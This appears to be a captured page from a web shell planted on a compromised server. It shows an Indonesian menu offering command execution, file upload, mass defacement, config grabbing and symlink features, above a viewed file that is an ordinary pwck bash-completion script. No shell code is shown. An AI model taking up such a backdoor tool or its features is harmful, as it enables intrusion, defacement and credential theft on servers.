OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /var/../usr/lib32/../share/aclocal-1.16/../bash-completion/completions/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
# pwck(8) completion -*- shell-script -*- _pwck() { local cur prev words cword _init_completion || return if [[ "$cur" == -* ]]; then local opts=$(_parse_help "$1") COMPREPLY=( $(compgen -W '${opts:-$(_parse_usage "$1")}' -- "$cur") ) return fi _filedir } && complete -F _pwck pwck # ex: filetype=sh